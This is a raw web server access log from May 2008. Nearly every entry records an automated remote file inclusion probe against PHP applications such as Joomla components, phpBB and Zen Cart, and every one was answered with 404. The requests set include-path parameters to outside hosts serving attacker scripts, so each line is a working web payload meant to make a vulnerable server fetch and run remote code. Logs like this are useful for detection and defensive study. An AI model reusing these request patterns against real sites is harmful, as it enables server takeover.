216.110.12.93 - - [14/May/2008:22:29:31 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:29:32 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:29:35 -0700] "GET /logs/access_080502.log//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:29:37 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:29:38 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "jainvestigation.com"
222.124.213.71 - - [14/May/2008:22:29:41 -0700] "GET /logs/access.log//atom.php5?page=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:29:58 -0700] "GET /logs/access_080502.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:29:58 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:29:59 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:08 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:30:27 -0700] "GET /web.php?page=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:30:27 -0700] "GET /logs/web.php?page=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:30:28 -0700] "GET //atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:30:28 -0700] "GET /logs//atom.php5?page=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:30:38 -0700] "GET /web.php?page=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:30:38 -0700] "GET /logs/web.php?page=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:30:41 -0700] "GET /logs/access.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:30:42 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.246.45.242 - - [14/May/2008:22:30:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
216.246.45.242 - - [14/May/2008:22:30:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:30:42 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:30:52 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:30:52 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:30:52 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:30:56 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:30:57 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:30:57 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:58 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:58 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.139.221.64 - - [14/May/2008:22:30:58 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:01 -0700] "GET /logs/access_080503.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:01 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.jainvestigation.com"
64.202.120.143 - - [14/May/2008:22:31:12 -0700] "GET //atom.php5?page=http://www.geocities.com/elmaalia/maknyus.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:31:13 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:31:13 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:31:27 -0700] "GET /logs//include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:31:28 -0700] "GET //include.php?path[docroot]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:36 -0700] "GET /logs/access_080501.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:37 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:31:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:31:46 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:31:46 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
89.31.204.9 - - [14/May/2008:22:31:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:32:12 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:32:12 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:32:12 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:32:14 -0700] "GET /logs/access_080429.log/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
216.246.45.242 - - [14/May/2008:22:32:19 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:32:21 -0700] "GET /logs/access_080502.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:32:22 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:32:22 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:32:23 -0700] "GET /logs/access_080502.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:32:23 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
217.28.65.47 - - [14/May/2008:22:32:23 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.e-sportv.com/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:32:31 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:32:32 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:32:32 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:32:32 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:32:33 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
71.70.174.116 - - [14/May/2008:22:32:34 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:32:42 -0700] "GET /logs/access_080429.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:32:43 -0700] "GET /config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
218.224.254.13 - - [14/May/2008:22:32:43 -0700] "GET /logs/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:33:11 -0700] "GET /logs/access_080429.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:33:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:33:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
72.232.247.42 - - [14/May/2008:22:33:16 -0700] "GET //include.php?path[docroot]=http://www.geocities.com/cmd182182/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "jainvestigation.com"
72.55.148.27 - - [14/May/2008:22:33:20 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
216.7.32.9 - - [14/May/2008:22:33:24 -0700] "GET /logs/access_080501.log/class/forumpollrenderer.php?bbPath[path]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.7.32.9 - - [14/May/2008:22:33:24 -0700] "GET /class/forumpollrenderer.php?bbPath[path]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
216.7.32.9 - - [14/May/2008:22:33:24 -0700] "GET /logs/class/forumpollrenderer.php?bbPath[path]=http://www.2knowit.net/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:33:36 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:33:36 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:33:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:34:11 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:34:11 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:34:12 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
81.169.182.59 - - [14/May/2008:22:34:12 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "jainvestigation.com"
206.221.179.200 - - [14/May/2008:22:34:16 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
206.221.179.200 - - [14/May/2008:22:34:16 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
206.221.179.200 - - [14/May/2008:22:34:16 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.jainvestigation.com"
203.146.251.123 - - [14/May/2008:22:34:32 -0700] "GET /logs/access.log/index2.php?mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:34:33 -0700] "GET /logs/access_080429.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:34:34 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
85.214.25.183 - - [14/May/2008:22:34:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.mevlana-reisen.de/libraries/pcl/in2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:34:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
222.255.3.68 - - [14/May/2008:22:34:39 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://linknetcrew.com/source/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:34:40 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:34:41 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:35:24 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:35:24 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
80.67.24.2 - - [14/May/2008:22:35:24 -0700] "GET /logs/access_080503.log/config.php?path_to_root=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.jainvestigation.com"
216.110.12.93 - - [14/May/2008:22:35:24 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "jainvestigation.com"
87.106.68.149 - - [14/May/2008:22:35:32 -0700] "GET /logs/access_080503.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.stiri-mondene.com//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:35:35 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:35:35 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.jainvestigation.com"
166.70.232.131 - - [14/May/2008:22:35:37 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
166.70.232.131 - - [14/May/2008:22:35:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
166.70.232.131 - - [14/May/2008:22:35:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.arpel.org/ex/baram.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:35:40 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "jainvestigation.com"
207.44.248.81 - - [14/May/2008:22:35:40 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "jainvestigation.com"
74.53.197.2 - - [14/May/2008:22:35:51 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://83.222.131.90/~legitimi/subscription/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.jainvestigation.com"
